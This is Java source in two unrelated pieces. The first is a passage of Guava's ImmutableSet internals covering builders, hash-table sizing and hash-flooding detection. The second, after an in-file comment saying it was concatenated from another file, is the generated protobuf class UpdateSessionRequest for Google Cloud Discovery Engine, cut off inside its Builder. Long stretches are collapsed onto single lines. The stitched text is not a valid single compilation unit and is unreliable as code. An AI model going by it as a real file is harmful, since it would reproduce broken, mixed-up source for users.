    @LazyInit @RetainedWith private transient @Nullable ImmutableList<E> asList;

    @Override
    public ImmutableList<E> asList() {
      ImmutableList<E> result = asList;
      if (result == null) {
        return asList = createAsList();
      } else {
        return result;
      }
    }

    ImmutableList<E> createAsList() {
      return new RegularImmutableAsList<>(this, toArray());
    }

    // redeclare to help optimizers with b/310253115
    @SuppressWarnings("RedundantOverride")
    @Override
    @J2ktIncompatible
    @GwtIncompatible
    Object writeReplace() {
      return super.writeReplace();
    }
  }

  // Partial implementation for sets whose elements are addressable by index.
  abstract static class Indexed<E> extends CachingAsList<E> {
    abstract E get(int index);

    @Override
    public UnmodifiableIterator<E> iterator() {
      return asList().iterator();
    }

    @Override
    public Spliterator<E> spliterator() {
      return CollectSpliterators.indexed(size(), SPLITERATOR_CHARACTERISTICS, this::get);
    }

    @Override
    public void forEach(Consumer<? super E> consumer) {
      checkNotNull(consumer);
      int n = size();
      for (int i = 0; i < n; i++) {
        consumer.accept(get(i));
      }
    }

    @Override
    int copyIntoArray(@Nullable Object[] dst, int offset) {
      return asList().copyIntoArray(dst, offset);
    }

    @Override
    ImmutableList<E> createAsList() {
      return new ImmutableAsList<E>() {
        @Override
        public E get(int index) {
          return Indexed.this.get(index);
        }

        @Override
        Indexed<E> delegateCollection() {
          return Indexed.this;
        }

        // redeclare to help optimizers with b/310253115
        @SuppressWarnings("RedundantOverride")
        @Override
        @J2ktIncompatible
        @GwtIncompatible
        Object writeReplace() {
          return super.writeReplace();
        }
      };
    }

    // redeclare to help optimizers with b/310253115
    @SuppressWarnings("RedundantOverride")
    @Override
    @J2ktIncompatible
    @GwtIncompatible
    Object writeReplace() {
      return super.writeReplace();
    }
  }

  /*
   * This class is used to serialize all ImmutableSet instances, except for
   * ImmutableEnumSet/ImmutableSortedSet, regardless of implementation type. It
   * captures their "logical contents" and they are reconstructed using public
   * static factories. This is necessary to ensure that the existence of a
   * particular implementation type is an implementation detail.
   */
  @J2ktIncompatible // serialization
  private static final class SerializedForm implements Serializable {
    final Object[] elements;

    SerializedForm(Object[] elements) {
      this.elements = elements;
    }

    Object readResolve() {
      return copyOf(elements);
    }

    @GwtIncompatible @J2ktIncompatible private static final long serialVersionUID = 0;
  }

  @Override
  @J2ktIncompatible
  Object writeReplace() {
    return new SerializedForm(toArray());
  }

  @J2ktIncompatible
  private void readObject(ObjectInputStream stream) throws InvalidObjectException {
    throw new InvalidObjectException("Use SerializedForm");
  }

  /**
   * Returns a new builder. The generated builder is equivalent to the builder created by the {@link
   * Builder} constructor.
   */
  public static <E> Builder<E> builder() {
    return new Builder<>();
  }

  /**
   * Returns a new builder, expecting the specified number of distinct elements to be added.
   *
   * <p>If {@code expectedSize} is exactly the number of distinct elements added to the builder
   * before {@link Builder#build} is called, the builder is likely to perform better than an unsized
   * {@link #builder()} would have.
   *
   * <p>It is not specified if any performance benefits apply if {@code expectedSize} is close to,
   * but not exactly, the number of distinct elements added to the builder.
   *
   * @since 23.1
   */
  public static <E> Builder<E> builderWithExpectedSize(int expectedSize) {
    checkNonnegative(expectedSize, "expectedSize");
    return new Builder<>(expectedSize);
  }

  /**
   * A builder for creating {@code ImmutableSet} instances. Example:
   *
   * {@snippet :
   * static final ImmutableSet<Color> GOOGLE_COLORS =
   *     ImmutableSet.<Color>builder()
   *         .addAll(WEBSAFE_COLORS)
   *         .add(new Color(0, 191, 255))
   *         .build();
   * }
   *
   * <p>Elements appear in the resulting set in the same order they were first added to the builder.
   *
   * <p>Building does not change the state of the builder, so it is still possible to add more
   * elements and to build again.
   *
   * @since 2.0
   */
  public static class Builder<E> extends ImmutableCollection.Builder<E> {
    /*
     * `impl` is null only for instances of the subclass, ImmutableSortedSet.Builder. That subclass
     * overrides all the methods that access it here. Thus, all the methods here can safely assume
     * that this field is non-null.
     */
    private @Nullable SetBuilderImpl<E> impl;
    boolean forceCopy;

    public Builder() {
      this(0);
    }

    Builder(int capacity) {
      if (capacity > 0) {
        impl = new RegularSetBuilderImpl<>(capacity);
      } else {
        impl = EmptySetBuilderImpl.instance();
      }
    }

    Builder(@SuppressWarnings("unused") boolean subclass) {
      this.impl = null; // unused
    }

    @VisibleForTesting
    void forceJdk() {
      requireNonNull(impl); // see the comment on the field
      this.impl = new JdkBackedSetBuilderImpl<>(impl);
    }

    final void copyIfNecessary() {
      if (forceCopy) {
        copy();
        forceCopy = false;
      }
    }

    void copy() {
      requireNonNull(impl); // see the comment on the field
      impl = impl.copy();
    }

    @Override
    @CanIgnoreReturnValue
    public Builder<E> add(E element) {
      requireNonNull(impl); // see the comment on the field
      checkNotNull(element);
      copyIfNecessary();
      impl = impl.add(element);
      return this;
    }

    @Override
    @CanIgnoreReturnValue
    public Builder<E> add(E... elements) {
      super.add(elements);
      return this;
    }

    /**
     * Adds each element of {@code elements} to the {@code ImmutableSet}, ignoring duplicate
     * elements (only the first duplicate element is added).
     *
     * @param elements the elements to add
     * @return this {@code Builder} object
     * @throws NullPointerException if {@code elements} is null or contains a null element
     */
    @Override
    @CanIgnoreReturnValue
    public Builder<E> addAll(Iterable<? extends E> elements) {
      super.addAll(elements);
      return this;
    }

    @Override
    @CanIgnoreReturnValue
    public Builder<E> addAll(Iterator<? extends E> elements) {
      super.addAll(elements);
      return this;
    }

    @CanIgnoreReturnValue
    Builder<E> combine(Builder<E> other) {
      requireNonNull(impl);
      requireNonNull(other.impl);
      /*
       * For discussion of requireNonNull, see the comment on the field.
       *
       * (And I don't believe there's any situation in which we call x.combine(y) when x is a plain
       * ImmutableSet.Builder but y is an ImmutableSortedSet.Builder (or vice versa). Certainly
       * ImmutableSortedSet.Builder.combine() is written as if its argument will never be a plain
       * ImmutableSet.Builder: It casts immediately to ImmutableSortedSet.Builder.)
       */
      copyIfNecessary();
      this.impl = this.impl.combine(other.impl);
      return this;
    }

    @Override
    public ImmutableSet<E> build() {
      requireNonNull(impl); // see the comment on the field
      forceCopy = true;
      impl = impl.review();
      return impl.build();
    }
  }

  /** Swappable internal implementation of an ImmutableSet.Builder. */
  private abstract static class SetBuilderImpl<E> {
    // The first `distinct` elements are non-null.
    // Since we can never access null elements, we don't mark this nullable.
    E[] dedupedElements;
    int distinct;

    @SuppressWarnings("unchecked")
    SetBuilderImpl(int expectedCapacity) {
      this.dedupedElements = (E[]) new Object[expectedCapacity];
      this.distinct = 0;
    }

    /** Initializes this SetBuilderImpl with a copy of the deduped elements array from toCopy. */
    SetBuilderImpl(SetBuilderImpl<E> toCopy) {
      this.dedupedElements = Arrays.copyOf(toCopy.dedupedElements, toCopy.dedupedElements.length);
      this.distinct = toCopy.distinct;
    }

    /**
     * Resizes internal data structures if necessary to store the specified number of distinct
     * elements.
     */
    private void ensureCapacity(int minCapacity) {
      if (minCapacity > dedupedElements.length) {
        int newCapacity =
            ImmutableCollection.Builder.expandedCapacity(dedupedElements.length, minCapacity);
        dedupedElements = Arrays.copyOf(dedupedElements, newCapacity);
      }
    }

    /** Adds e to the insertion-order array of deduplicated elements. Calls ensureCapacity. */
    final void addDedupedElement(E e) {
      ensureCapacity(distinct + 1);
      dedupedElements[distinct++] = e;
    }

    /**
     * Adds e to this SetBuilderImpl, returning the updated result. Only use the returned
     * SetBuilderImpl, since we may switch implementations if e.g. hash flooding is detected.
     */
    abstract SetBuilderImpl<E> add(E e);

    /** Adds all the elements from the specified SetBuilderImpl to this SetBuilderImpl. */
    final SetBuilderImpl<E> combine(SetBuilderImpl<E> other) {
      SetBuilderImpl<E> result = this;
      for (int i = 0; i < other.distinct; i++) {
        /*
         * requireNonNull is safe because we ensure that the first `distinct` elements have been
         * populated.
         */
        result = result.add(requireNonNull(other.dedupedElements[i]));
      }
      return result;
    }

    /**
     * Creates a new copy of this SetBuilderImpl. Modifications to that SetBuilderImpl will not
     * affect this SetBuilderImpl or sets constructed from this SetBuilderImpl via build().
     */
    abstract SetBuilderImpl<E> copy();

    /**
     * Call this before build(). Does a final check on the internal data structures, e.g. shrinking
     * unnecessarily large structures or detecting previously unnoticed hash flooding.
     */
    SetBuilderImpl<E> review() {
      return this;
    }

    abstract ImmutableSet<E> build();
  }

  // Builder implementation used while no element has been added yet.
  private static final class EmptySetBuilderImpl<E> extends SetBuilderImpl<E> {
    private static final EmptySetBuilderImpl<Object> INSTANCE = new EmptySetBuilderImpl<>();

    @SuppressWarnings("unchecked")
    static <E> SetBuilderImpl<E> instance() {
      return (SetBuilderImpl<E>) INSTANCE;
    }

    private EmptySetBuilderImpl() {
      super(0);
    }

    @Override
    SetBuilderImpl<E> add(E e) {
      return new RegularSetBuilderImpl<E>(Builder.DEFAULT_INITIAL_CAPACITY).add(e);
    }

    @Override
    SetBuilderImpl<E> copy() {
      return this;
    }

    @Override
    ImmutableSet<E> build() {
      return ImmutableSet.of();
    }
  }

  // We use power-of-2 tables, and this is the highest int that's a power of 2
  static final int MAX_TABLE_SIZE = Ints.MAX_POWER_OF_TWO;

  // Represents how tightly we can pack things, as a maximum.
private static final double DESIRED_LOAD_FACTOR = 0.7; // If the set has this many elements, it will "max out" the table size private static final int CUTOFF = (int) (MAX_TABLE_SIZE * DESIRED_LOAD_FACTOR); /** * Returns an array size suitable for the backing array of a hash table that uses open addressing * with linear probing in its implementation. The returned size is the smallest power of two that * can hold setSize elements with the desired load factor. Always returns at least setSize + 2. */ // TODO(cpovirk): Move to Hashing or something, since it's used elsewhere in the Android version. static int chooseTableSize(int setSize) { setSize = max(setSize, 2); // Correct the size for open addressing to match desired load factor. if (setSize < CUTOFF) { // Round up to the next highest power of 2. int tableSize = Integer.highestOneBit(setSize - 1) << 1; while (tableSize * DESIRED_LOAD_FACTOR < setSize) { tableSize <<= 1; } return tableSize; } // The table can't be completely full or we'll get infinite reprobes checkArgument(setSize < MAX_TABLE_SIZE, "collection too large"); return MAX_TABLE_SIZE; } /** * Default implementation of the guts of ImmutableSet.Builder, creating an open-addressed hash * table and deduplicating elements as they come, so it only allocates O(max(distinct, * expectedCapacity)) rather than O(calls to add). * * <p>This implementation attempts to detect hash flooding, and if it's identified, falls back to * JdkBackedSetBuilderImpl. 
*/ private static final class RegularSetBuilderImpl<E> extends SetBuilderImpl<E> { // null until at least two elements are present private @Nullable Object @Nullable [] hashTable; private int maxRunBeforeFallback; private int expandTableThreshold; private int hashCode; RegularSetBuilderImpl(int expectedCapacity) { super(expectedCapacity); this.hashTable = null; this.maxRunBeforeFallback = 0; this.expandTableThreshold = 0; } RegularSetBuilderImpl(RegularSetBuilderImpl<E> toCopy) { super(toCopy); this.hashTable = (toCopy.hashTable == null) ? null : toCopy.hashTable.clone(); this.maxRunBeforeFallback = toCopy.maxRunBeforeFallback; this.expandTableThreshold = toCopy.expandTableThreshold; this.hashCode = toCopy.hashCode; } @Override SetBuilderImpl<E> add(E e) { checkNotNull(e); if (hashTable == null) { if (distinct == 0) { addDedupedElement(e); return this; } else { ensureTableCapacity(dedupedElements.length); E elem = dedupedElements[0]; distinct--; return insertInHashTable(elem).add(e); } } return insertInHashTable(e); } private SetBuilderImpl<E> insertInHashTable(E e) { requireNonNull(hashTable); int eHash = e.hashCode(); int i0 = Hashing.smear(eHash); int mask = hashTable.length - 1; for (int i = i0; i - i0 < maxRunBeforeFallback; i++) { int index = i & mask; Object tableEntry = hashTable[index]; if (tableEntry == null) { addDedupedElement(e); hashTable[index] = e; hashCode += eHash; ensureTableCapacity(distinct); // rebuilds table if necessary return this; } else if (tableEntry.equals(e)) { // not a new element, ignore return this; } } // we fell out of the loop due to a long run; fall back to JDK impl return new JdkBackedSetBuilderImpl<E>(this).add(e); } @Override SetBuilderImpl<E> copy() { return new RegularSetBuilderImpl<>(this); } @Override SetBuilderImpl<E> review() { if (hashTable == null) { return this; } int targetTableSize = chooseTableSize(distinct); if (targetTableSize * 2 < hashTable.length) { hashTable = rebuildHashTable(targetTableSize, 
dedupedElements, distinct); maxRunBeforeFallback = maxRunBeforeFallback(targetTableSize); expandTableThreshold = (int) (DESIRED_LOAD_FACTOR * targetTableSize); } return hashFloodingDetected(hashTable) ? new JdkBackedSetBuilderImpl<E>(this) : this; } @Override ImmutableSet<E> build() { switch (distinct) { case 0: return of(); case 1: /* * requireNonNull is safe because we ensure that the first `distinct` elements have been * populated. */ return of(requireNonNull(dedupedElements[0])); default: /* * The suppression is safe because we ensure that the first `distinct` elements have been * populated. */ @SuppressWarnings("nullness") Object[] elements = (distinct == dedupedElements.length) ? dedupedElements : Arrays.copyOf(dedupedElements, distinct); return new RegularImmutableSet<>( elements, hashCode, requireNonNull(hashTable), hashTable.length - 1); } } /** Builds a new open-addressed hash table from the first n objects in elements. */ static @Nullable Object[] rebuildHashTable(int newTableSize, Object[] elements, int n) { @Nullable Object[] hashTable = new @Nullable Object[newTableSize]; int mask = hashTable.length - 1; for (int i = 0; i < n; i++) { // requireNonNull is safe because we ensure that the first n elements have been populated. 
Object e = requireNonNull(elements[i]); int j0 = Hashing.smear(e.hashCode()); for (int j = j0; ; j++) { int index = j & mask; if (hashTable[index] == null) { hashTable[index] = e; break; } } } return hashTable; } void ensureTableCapacity(int minCapacity) { int newTableSize; if (hashTable == null) { newTableSize = chooseTableSize(minCapacity); hashTable = new Object[newTableSize]; } else if (minCapacity > expandTableThreshold && hashTable.length < MAX_TABLE_SIZE) { newTableSize = hashTable.length * 2; hashTable = rebuildHashTable(newTableSize, dedupedElements, distinct); } else { return; } maxRunBeforeFallback = maxRunBeforeFallback(newTableSize); expandTableThreshold = (int) (DESIRED_LOAD_FACTOR * newTableSize); } /** * We attempt to detect deliberate hash flooding attempts. If one is detected, we fall back to a * wrapper around j.u.HashSet, which has built-in flooding protection. MAX_RUN_MULTIPLIER was * determined experimentally to match our desired probability of false positives. */ // NB: yes, this is surprisingly high, but that's what the experiments said was necessary // Raising this number slows the worst-case contains behavior, speeds up hashFloodingDetected, // and reduces the false-positive probability. static final int MAX_RUN_MULTIPLIER = 13; /** * Checks the whole hash table for poor hash distribution. Takes O(n) in the worst case, O(n / * log n) on average. * * <p>The online hash flooding detecting in RegularSetBuilderImpl.add can detect e.g. many * exactly matching hash codes, which would cause construction to take O(n^2), but can't detect * e.g. hash codes adversarially designed to go into ascending table locations, which keeps * construction O(n) (as desired) but then can have O(n) queries later. * * <p>If this returns false, then no query can take more than O(log n). 
* * <p>Note that for a RegularImmutableSet with elements with truly random hash codes, contains * operations take expected O(1) time but with high probability take O(log n) for at least some * element. (https://en.wikipedia.org/wiki/Linear_probing#Analysis) * * <p>This method may return {@code true} even on truly random input, but {@code * ImmutableSetTest} tests that the probability of that is low. */ static boolean hashFloodingDetected(@Nullable Object[] hashTable) { int maxRunBeforeFallback = maxRunBeforeFallback(hashTable.length); int mask = hashTable.length - 1; // Invariant: all elements at indices in [knownRunStart, knownRunEnd) are nonnull. // If knownRunStart == knownRunEnd, this is vacuously true. // When knownRunEnd exceeds hashTable.length, it "wraps", detecting runs around the end // of the table. int knownRunStart = 0; int knownRunEnd = 0; outerLoop: while (knownRunStart < hashTable.length) { if (knownRunStart == knownRunEnd && hashTable[knownRunStart] == null) { if (hashTable[(knownRunStart + maxRunBeforeFallback - 1) & mask] == null) { // There are only maxRunBeforeFallback - 1 elements between here and there, // so even if they were all nonnull, we wouldn't detect a hash flood. Therefore, // we can skip them all. knownRunStart += maxRunBeforeFallback; } else { knownRunStart++; // the only case in which maxRunEnd doesn't increase by mRBF // happens about f * (1-f) for f = DESIRED_LOAD_FACTOR, so around 21% of the time } knownRunEnd = knownRunStart; } else { for (int j = knownRunStart + maxRunBeforeFallback - 1; j >= knownRunEnd; j--) { if (hashTable[j & mask] == null) { knownRunEnd = knownRunStart + maxRunBeforeFallback; knownRunStart = j + 1; continue outerLoop; } } return true; } } return false; } /** * If more than this many consecutive positions are filled in a table of the specified size, * report probable hash flooding. 
({@link #hashFloodingDetected} may also report hash flooding * if fewer consecutive positions are filled; see that method for details.) */ static int maxRunBeforeFallback(int tableSize) { return MAX_RUN_MULTIPLIER * IntMath.log2(tableSize, RoundingMode.UNNECESSARY); } } /** * SetBuilderImpl version that uses a JDK HashSet, which has built in hash flooding protection. */ private static final class JdkBackedSetBuilderImpl<E> extends SetBuilderImpl<E> { private final Set<Object> delegate; JdkBackedSetBuilderImpl(SetBuilderImpl<E> toCopy) { super(toCopy); // initializes dedupedElements and distinct delegate = Sets.newHashSetWithExpectedSize(distinct); for (int i = 0; i < distinct; i++) { /* * requireNonNull is safe because we ensure that the first `distinct` elements have been * populated. */ delegate.add(requireNonNull(dedupedElements[i])); } } @Override SetBuilderImpl<E> add(E e) { checkNotNull(e); if (delegate.add(e)) { addDedupedElement(e); } return this; } @Override SetBuilderImpl<E> copy() { return new JdkBackedSetBuilderImpl<>(this); } @Override ImmutableSet<E> build() { switch (distinct) { case 0: return of(); case 1: /* * requireNonNull is safe because we ensure that the first `distinct` elements have been * populated. */ return of(requireNonNull(dedupedElements[0])); default: return new JdkBackedImmutableSet<>(delegate, asImmutableList(dedupedElements, distinct)); } } } private static int estimatedSizeForUnknownDuplication(int inputElementsIncludingAnyDuplicates) { if (inputElementsIncludingAnyDuplicates < ImmutableCollection.Builder.DEFAULT_INITIAL_CAPACITY) { return inputElementsIncludingAnyDuplicates; } // Guess the size is "halfway between" all duplicates and no duplicates, on a log scale. return max( ImmutableCollection.Builder.DEFAULT_INITIAL_CAPACITY, sqrt(inputElementsIncludingAnyDuplicates, RoundingMode.CEILING)); } @GwtIncompatible @J2ktIncompatible private static final long serialVersionUID = 0xcafebabe; }
// ============================================================================
// NOTE(review): everything below this point belongs to a DIFFERENT generated
// file that was concatenated into this one and should be restored to its own
// compilation unit. The original (non-Java) dataset metadata rows that marked
// the boundary are preserved here as comments:
//   googleapis/google-cloud-java
//   35,832
//   java-discoveryengine/proto-google-cloud-discoveryengine-v1beta/src/main/java/com/google/cloud/discoveryengine/v1beta/UpdateSessionRequest.java
// ============================================================================
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/discoveryengine/v1beta/conversational_search_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.discoveryengine.v1beta; /** * * * <pre> * Request for UpdateSession method. * </pre> * * Protobuf type {@code google.cloud.discoveryengine.v1beta.UpdateSessionRequest} */ public final class UpdateSessionRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.discoveryengine.v1beta.UpdateSessionRequest) UpdateSessionRequestOrBuilder { private static final long serialVersionUID = 0L; // Use UpdateSessionRequest.newBuilder() to construct. 
private UpdateSessionRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
    super(builder);
  }

  private UpdateSessionRequest() {}

  @java.lang.Override
  @SuppressWarnings({"unused"})
  protected java.lang.Object newInstance(UnusedPrivateParameter unused) {
    return new UpdateSessionRequest();
  }

  public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() {
    return com.google.cloud.discoveryengine.v1beta.ConversationalSearchServiceProto
        .internal_static_google_cloud_discoveryengine_v1beta_UpdateSessionRequest_descriptor;
  }

  @java.lang.Override
  protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
      internalGetFieldAccessorTable() {
    return com.google.cloud.discoveryengine.v1beta.ConversationalSearchServiceProto
        .internal_static_google_cloud_discoveryengine_v1beta_UpdateSessionRequest_fieldAccessorTable
        .ensureFieldAccessorsInitialized(
            com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.class,
            com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.Builder.class);
  }

  // Field-presence bits: 0x1 = session, 0x2 = update_mask.
  private int bitField0_;
  public static final int SESSION_FIELD_NUMBER = 1;
  private com.google.cloud.discoveryengine.v1beta.Session session_;

  /**
   *
   *
   * <pre>
   * Required. The Session to update.
   * </pre>
   *
   * <code>
   * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
   * </code>
   *
   * @return Whether the session field is set.
   */
  @java.lang.Override
  public boolean hasSession() {
    return ((bitField0_ & 0x00000001) != 0);
  }

  /**
   *
   *
   * <pre>
   * Required. The Session to update.
   * </pre>
   *
   * <code>
   * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
   * </code>
   *
   * @return The session.
   */
  @java.lang.Override
  public com.google.cloud.discoveryengine.v1beta.Session getSession() {
    return session_ == null
        ? com.google.cloud.discoveryengine.v1beta.Session.getDefaultInstance()
        : session_;
  }

  /**
   *
   *
   * <pre>
   * Required. The Session to update.
   * </pre>
   *
   * <code>
   * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
   * </code>
   */
  @java.lang.Override
  public com.google.cloud.discoveryengine.v1beta.SessionOrBuilder getSessionOrBuilder() {
    return session_ == null
        ? com.google.cloud.discoveryengine.v1beta.Session.getDefaultInstance()
        : session_;
  }

  public static final int UPDATE_MASK_FIELD_NUMBER = 2;
  private com.google.protobuf.FieldMask updateMask_;

  /**
   *
   *
   * <pre>
   * Indicates which fields in the provided
   * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The
   * following are NOT supported:
   *
   * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name]
   *
   * If not set or empty, all supported fields are updated.
   * </pre>
   *
   * <code>.google.protobuf.FieldMask update_mask = 2;</code>
   *
   * @return Whether the updateMask field is set.
   */
  @java.lang.Override
  public boolean hasUpdateMask() {
    return ((bitField0_ & 0x00000002) != 0);
  }

  /**
   *
   *
   * <pre>
   * Indicates which fields in the provided
   * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The
   * following are NOT supported:
   *
   * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name]
   *
   * If not set or empty, all supported fields are updated.
   * </pre>
   *
   * <code>.google.protobuf.FieldMask update_mask = 2;</code>
   *
   * @return The updateMask.
   */
  @java.lang.Override
  public com.google.protobuf.FieldMask getUpdateMask() {
    return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_;
  }

  /**
   *
   *
   * <pre>
   * Indicates which fields in the provided
   * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The
   * following are NOT supported:
   *
   * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name]
   *
   * If not set or empty, all supported fields are updated.
* </pre>
   *
   * <code>.google.protobuf.FieldMask update_mask = 2;</code>
   */
  @java.lang.Override
  public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() {
    return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_;
  }

  // -1 = not yet computed, 1 = initialized, 0 = not initialized (memoized).
  private byte memoizedIsInitialized = -1;

  @java.lang.Override
  public final boolean isInitialized() {
    byte isInitialized = memoizedIsInitialized;
    if (isInitialized == 1) return true;
    if (isInitialized == 0) return false;

    memoizedIsInitialized = 1;
    return true;
  }

  @java.lang.Override
  public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException {
    if (((bitField0_ & 0x00000001) != 0)) {
      output.writeMessage(1, getSession());
    }
    if (((bitField0_ & 0x00000002) != 0)) {
      output.writeMessage(2, getUpdateMask());
    }
    getUnknownFields().writeTo(output);
  }

  @java.lang.Override
  public int getSerializedSize() {
    int size = memoizedSize;
    if (size != -1) return size;

    size = 0;
    if (((bitField0_ & 0x00000001) != 0)) {
      size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, getSession());
    }
    if (((bitField0_ & 0x00000002) != 0)) {
      size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getUpdateMask());
    }
    size += getUnknownFields().getSerializedSize();
    memoizedSize = size;
    return size;
  }

  @java.lang.Override
  public boolean equals(final java.lang.Object obj) {
    if (obj == this) {
      return true;
    }
    if (!(obj instanceof com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest)) {
      return super.equals(obj);
    }
    com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest other =
        (com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest) obj;

    if (hasSession() != other.hasSession()) return false;
    if (hasSession()) {
      if (!getSession().equals(other.getSession())) return false;
    }
    if (hasUpdateMask() != other.hasUpdateMask()) return false;
    if (hasUpdateMask()) {
      if (!getUpdateMask().equals(other.getUpdateMask())) return false;
    }
    if (!getUnknownFields().equals(other.getUnknownFields())) return false;
    return true;
  }

  @java.lang.Override
  public int hashCode() {
    if (memoizedHashCode != 0) {
      return memoizedHashCode;
    }
    int hash = 41;
    hash = (19 * hash) + getDescriptor().hashCode();
    if (hasSession()) {
      hash = (37 * hash) + SESSION_FIELD_NUMBER;
      hash = (53 * hash) + getSession().hashCode();
    }
    if (hasUpdateMask()) {
      hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER;
      hash = (53 * hash) + getUpdateMask().hashCode();
    }
    hash = (29 * hash) + getUnknownFields().hashCode();
    memoizedHashCode = hash;
    return hash;
  }

  // Standard generated parseFrom overloads; all delegate to PARSER.
  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(
      java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(
      java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(
      com.google.protobuf.ByteString data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(
      com.google.protobuf.ByteString data,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(byte[] data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(
      byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(
      java.io.InputStream input) throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(
      java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseWithIOException(
        PARSER, input, extensionRegistry);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseDelimitedFrom(
      java.io.InputStream input) throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseDelimitedFrom(
      java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(
        PARSER, input, extensionRegistry);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(
      com.google.protobuf.CodedInputStream input) throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input);
  }

  public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(
      com.google.protobuf.CodedInputStream input,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseWithIOException(
        PARSER, input, extensionRegistry);
  }

  @java.lang.Override
  public Builder newBuilderForType() {
    return newBuilder();
  }

  public static Builder newBuilder() {
    return DEFAULT_INSTANCE.toBuilder();
  }

  public static Builder newBuilder(
      com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest prototype) {
    return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
  }
@java.lang.Override
  public Builder toBuilder() {
    return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this);
  }

  @java.lang.Override
  protected Builder newBuilderForType(
      com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
    Builder builder = new Builder(parent);
    return builder;
  }

  /**
   *
   *
   * <pre>
   * Request for UpdateSession method.
   * </pre>
   *
   * Protobuf type {@code google.cloud.discoveryengine.v1beta.UpdateSessionRequest}
   */
  public static final class Builder
      extends com.google.protobuf.GeneratedMessageV3.Builder<Builder>
      implements
      // @@protoc_insertion_point(builder_implements:google.cloud.discoveryengine.v1beta.UpdateSessionRequest)
      com.google.cloud.discoveryengine.v1beta.UpdateSessionRequestOrBuilder {
    public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() {
      return com.google.cloud.discoveryengine.v1beta.ConversationalSearchServiceProto
          .internal_static_google_cloud_discoveryengine_v1beta_UpdateSessionRequest_descriptor;
    }

    @java.lang.Override
    protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
        internalGetFieldAccessorTable() {
      return com.google.cloud.discoveryengine.v1beta.ConversationalSearchServiceProto
          .internal_static_google_cloud_discoveryengine_v1beta_UpdateSessionRequest_fieldAccessorTable
